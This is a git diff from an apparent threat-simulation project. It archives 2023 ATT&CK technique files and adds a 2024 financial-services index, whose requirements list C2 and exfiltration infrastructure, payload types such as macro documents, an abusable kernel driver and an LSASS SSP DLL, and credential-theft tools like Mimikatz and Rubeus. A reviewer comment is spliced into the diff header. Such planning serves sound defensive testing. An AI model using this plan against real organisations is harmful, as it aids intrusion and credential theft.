rename from rh-index-2023/navigator.json
rename to archived/2023/rh-index-2023/navigator.json
diff --git a/rh-index-2023/rh-index-2023-v1.2-summary.csv b/archived/2023/rh-index-2023/rh-index-2023-v1.2-summary.csv
similarity index 100%
rename from rh-index-2023/rh-index-2023-v1.2-summary.csv
rename to archived/2023/rh-index-2023/rh-index-2023-v1.2-summary.csv
diff --git a/rh-index-2023/rh-index-2023-v1.2.yml b/archived/2023/rh-index-2023/rh-index-2023-v1.2.yml
similarity index 100%
rename from rh-index-2023/rh-index-2023-v1.2.yml
rename to archived/2023/rh-index-2023/rh-index-2023-v1.2.yml
diff --git a/rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml b/archived/2023/rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
rename to archived/2023/rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
diff --git a/rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1106_exe_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1106_exe_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1106_exe_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1106_exe_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml
diff --git a/rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml b/archived/2023/rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
rename to archived/2023/rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
diff --git a/rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml b/archived/2023/rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
rename to archived/2023/rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
diff --git a/rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml b/archived/2023/rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml
rename to archived/2023/rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
diff --git a/rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml b/archived/2023/rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
rename to archived/2023/rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
diff --git a/rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml b/archived/2023/rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
rename to archived/2023/rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
diff --git a/rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
diff --git a/rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml
diff --git a/rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
diff --git a/rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
diff --git a/fs-index-2024/CHANGELOG.md b/fs-index-2024/CHANGELOG.md
new file mode 100644
index 0000000..b5315fa
--- /dev/null
+++ b/fs-index-2024/CHANGELOG.md
@@ -0,0 +1,4 @@
+# v1.0 (January 2024)
+
+- Initial release
+
diff --git a/fs-index-2024/REQUIREMENTS.md b/fs-index-2024/REQUIREMENTS.md
new file mode 100644
index 0000000..d41c3ca
--- /dev/null
+++ b/fs-index-2024/REQUIREMENTS.md
@@ -0,0 +1,39 @@
+# Infrastructure
+
+- Mail server/relay to send emails
+- Proxy/VPN
+- Proxy/VPN in non-standard geolocation
+- HTTP/S file hosting server
+- Command-and-control server(s) with HTTPS and HTTP channels
+- Accounts for : Cloud storage provider (exfil), remote assistance service (if applicable)
+- C3, or similar server for C2 over a webservice (and appropriate credentials for that service)
+- Domain(s) and certificate(s) for infrastructure
+
+# Payloads
+
+|#|Test Case|Payload|Notes|
+|---|---|---|---|
+|1|Attachment - Zipped macro|Macro-enabled Office doc in ZIP||
+|2|Attachment - ISO|ISO||
+|3|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes|
+|4|DLL execution using Rundll32|DLL||
+|5|Sideload a DLL into a legitimate application|DLL|can be shared with #4 as long as exported functions are as expected|
+|6|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL|
+|7||Sensitive data|Use dlptest.com for sample data|
+|8|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template||
+
+# Tools/Scripts
+
+- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect
+- SharpHound : https://github.com/BloodHoundAD/SharpHound
+- Net Scan : https://www.softperfect.com/products/networkscanner/
+- C3 : https://github.com/WithSecureLabs/C3
+- Mimikatz : https://github.com/gentilkiwi/mimikatz
+- Nanodump : https://github.com/fortra/nanodump
+- Rubeus : https://github.com/GhostPack/Rubeus
+- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI
+- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+- AADInternals : https://github.com/Gerenios/AADInternals
+
+
diff --git a/fs-index-2024/fs-index-2024-v1.0-layer.json b/fs-index-2024/fs-index-2024-v1.0-layer.json
new file mode 100644
index 0000000..e9c8d73
--- /dev/null
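Review bot: The Tools/Scripts list names `AnyConnect` as a remote assistance tool, but AnyConnect is Cisco's VPN client rather than a remote-support product; `AnyDesk` is presumably what was intended, so the line should read `- Remote assistance tool such as TeamViewer, GoTo, or AnyDesk`. Row 7 of the Payloads table has an empty Test Case cell (`|7||Sensitive data|Use dlptest.com for sample data|`), which leaves the sample-data payload unattached to any test; name the exfiltration case it backs so operators can map it to the index entry. For row 3, the note pointing at the notebook should also state that the vulnerable driver must be unloaded and deleted once the test is complete, since a known-abusable signed driver left on a host is a real exposure rather than a simulated one.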
+++ b/fs-index-2024/fs-index-2024-v1.0-layer.json 
@@ -0,0 +1,3152 @@ +{ + "description": "Financial Services Threat Simulation Index 2024 v1.0", + "domain": "enterprise-attack", + "layout": { + "layout": "flat" + }, + "name": "Financial Services Threat Simulation Index 2024 v1.0", + "selectSubtechniquesWithParent": false, + "selectTechniquesAcrossTactics": false, + "techniques": [ + { + "enabled": false, + "techniqueID": "T1001" + }, + { + "enabled": false, + "techniqueID": "T1001.001" + }, + { + "enabled": false, + "techniqueID": "T1001.002" + }, + { + "enabled": false, + "techniqueID": "T1001.003" + }, + { + "enabled": false, + "techniqueID": "T1002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "enabled": false, + "techniqueID": "T1003.002" + }, + { + "enabled": false, + "techniqueID": "T1003.003" + }, + { + "enabled": false, + "techniqueID": "T1003.004" + }, + { + "enabled": false, + "techniqueID": "T1003.005" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.006" + }, + { + "enabled": false, + "techniqueID": "T1003.007" + }, + { + "enabled": false, + "techniqueID": "T1003.008" + }, + { + "enabled": false, + "techniqueID": "T1004" + }, + { + "enabled": false, + "techniqueID": "T1005" + }, + { + "enabled": false, + "techniqueID": "T1006" + }, + { + "enabled": false, + "techniqueID": "T1007" + }, + { + "enabled": false, + "techniqueID": "T1008" + }, + { + "enabled": false, + "techniqueID": "T1009" + }, + { + "enabled": false, + "techniqueID": "T1010" + }, + { + "enabled": false, + "techniqueID": "T1011" + }, + { + "enabled": false, + "techniqueID": "T1011.001" + }, + { + "enabled": false, + "techniqueID": "T1012" + }, 
+ { + "enabled": false, + "techniqueID": "T1013" + }, + { + "color": "#7a34eb", + "techniqueID": "T1014" + }, + { + "enabled": false, + "techniqueID": "T1015" + }, + { + "enabled": false, + "techniqueID": "T1016" + }, + { + "enabled": false, + "techniqueID": "T1016.001" + }, + { + "enabled": false, + "techniqueID": "T1016.002" + }, + { + "enabled": false, + "techniqueID": "T1017" + }, + { + "color": "#7a34eb", + "techniqueID": "T1018" + }, + { + "enabled": false, + "techniqueID": "T1019" + }, + { + "enabled": false, + "techniqueID": "T1020" + }, + { + "enabled": false, + "techniqueID": "T1020.001" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.003" + }, + { + "enabled": false, + "techniqueID": "T1021.004" + }, + { + "enabled": false, + "techniqueID": "T1021.005" + }, + { + "enabled": false, + "techniqueID": "T1021.006" + }, + { + "enabled": false, + "techniqueID": "T1021.007" + }, + { + "enabled": false, + "techniqueID": "T1021.008" + }, + { + "enabled": false, + "techniqueID": "T1022" + }, + { + "enabled": false, + "techniqueID": "T1023" + }, + { + "enabled": false, + "techniqueID": "T1024" + }, + { + "enabled": false, + "techniqueID": "T1025" + }, + { + "enabled": false, + "techniqueID": "T1026" + }, + { + "enabled": false, + "techniqueID": "T1027" + }, + { + "enabled": false, + "techniqueID": "T1027.001" + }, + { + "enabled": false, + "techniqueID": "T1027.002" + }, + { + "enabled": false, + "techniqueID": "T1027.003" + }, + { + "enabled": false, + "techniqueID": "T1027.004" + }, + { + "enabled": false, + "techniqueID": "T1027.005" + }, + { + "enabled": false, + "techniqueID": "T1027.006" + }, + { + "enabled": false, + "techniqueID": "T1027.007" + }, 
+ { + "enabled": false, + "techniqueID": "T1027.008" + }, + { + "enabled": false, + "techniqueID": "T1027.009" + }, + { + "enabled": false, + "techniqueID": "T1027.010" + }, + { + "enabled": false, + "techniqueID": "T1027.011" + }, + { + "enabled": false, + "techniqueID": "T1027.012" + }, + { + "enabled": false, + "techniqueID": "T1028" + }, + { + "enabled": false, + "techniqueID": "T1029" + }, + { + "enabled": false, + "techniqueID": "T1030" + }, + { + "enabled": false, + "techniqueID": "T1031" + }, + { + "enabled": false, + "techniqueID": "T1032" + }, + { + "enabled": false, + "techniqueID": "T1033" + }, + { + "enabled": false, + "techniqueID": "T1034" + }, + { + "enabled": false, + "techniqueID": "T1035" + }, + { + "enabled": false, + "techniqueID": "T1036" + }, + { + "enabled": false, + "techniqueID": "T1036.001" + }, + { + "enabled": false, + "techniqueID": "T1036.002" + }, + { + "enabled": false, + "techniqueID": "T1036.003" + }, + { + "enabled": false, + "techniqueID": "T1036.004" + }, + { + "enabled": false, + "techniqueID": "T1036.005" + }, + { + "enabled": false, + "techniqueID": "T1036.006" + }, + { + "enabled": false, + "techniqueID": "T1036.007" + }, + { + "enabled": false, + "techniqueID": "T1036.008" + }, + { + "enabled": false, + "techniqueID": "T1036.009" + }, + { + "enabled": false, + "techniqueID": "T1037" + }, + { + "enabled": false, + "techniqueID": "T1037.001" + }, + { + "enabled": false, + "techniqueID": "T1037.002" + }, + { + "enabled": false, + "techniqueID": "T1037.003" + }, + { + "enabled": false, + "techniqueID": "T1037.004" + }, + { + "enabled": false, + "techniqueID": "T1037.005" + }, + { + "enabled": false, + "techniqueID": "T1038" + }, + { + "enabled": false, + "techniqueID": "T1039" + }, + { + "enabled": false, + "techniqueID": "T1040" + }, + { + "color": "#7a34eb", + "techniqueID": "T1041" + }, + { + "enabled": false, + "techniqueID": "T1042" + }, + { + "enabled": false, + "techniqueID": "T1043" + }, + { + "enabled": false, + 
"techniqueID": "T1044" + }, + { + "enabled": false, + "techniqueID": "T1045" + }, + { + "color": "#7a34eb", + "techniqueID": "T1046" + }, + { + "enabled": false, + "techniqueID": "T1047" + }, + { + "showSubtechniques": true, + "techniqueID": "T1048" + }, + { + "enabled": false, + "techniqueID": "T1048.001" + }, + { + "enabled": false, + "techniqueID": "T1048.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1048.003" + }, + { + "enabled": false, + "techniqueID": "T1049" + }, + { + "enabled": false, + "techniqueID": "T1050" + }, + { + "enabled": false, + "techniqueID": "T1051" + }, + { + "enabled": false, + "techniqueID": "T1052" + }, + { + "enabled": false, + "techniqueID": "T1052.001" + }, + { + "showSubtechniques": true, + "techniqueID": "T1053" + }, + { + "enabled": false, + "techniqueID": "T1053.001" + }, + { + "enabled": false, + "techniqueID": "T1053.002" + }, + { + "enabled": false, + "techniqueID": "T1053.003" + }, + { + "enabled": false, + "techniqueID": "T1053.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1053.005" + }, + { + "enabled": false, + "techniqueID": "T1053.006" + }, + { + "enabled": false, + "techniqueID": "T1053.007" + }, + { + "enabled": false, + "techniqueID": "T1054" + }, + { + "enabled": false, + "techniqueID": "T1055" + }, + { + "enabled": false, + "techniqueID": "T1055.001" + }, + { + "enabled": false, + "techniqueID": "T1055.002" + }, + { + "enabled": false, + "techniqueID": "T1055.003" + }, + { + "enabled": false, + "techniqueID": "T1055.004" + }, + { + "enabled": false, + "techniqueID": "T1055.005" + }, + { + "enabled": false, + "techniqueID": "T1055.008" + }, + { + "enabled": false, + "techniqueID": "T1055.009" + }, + { + "enabled": false, + "techniqueID": "T1055.011" + }, + { + "enabled": false, + "techniqueID": "T1055.012" + }, + { + "enabled": false, + "techniqueID": "T1055.013" + }, + { + "enabled": false, + "techniqueID": "T1055.014" + }, + { + "enabled": false, + "techniqueID": "T1055.015" + }, + { + 
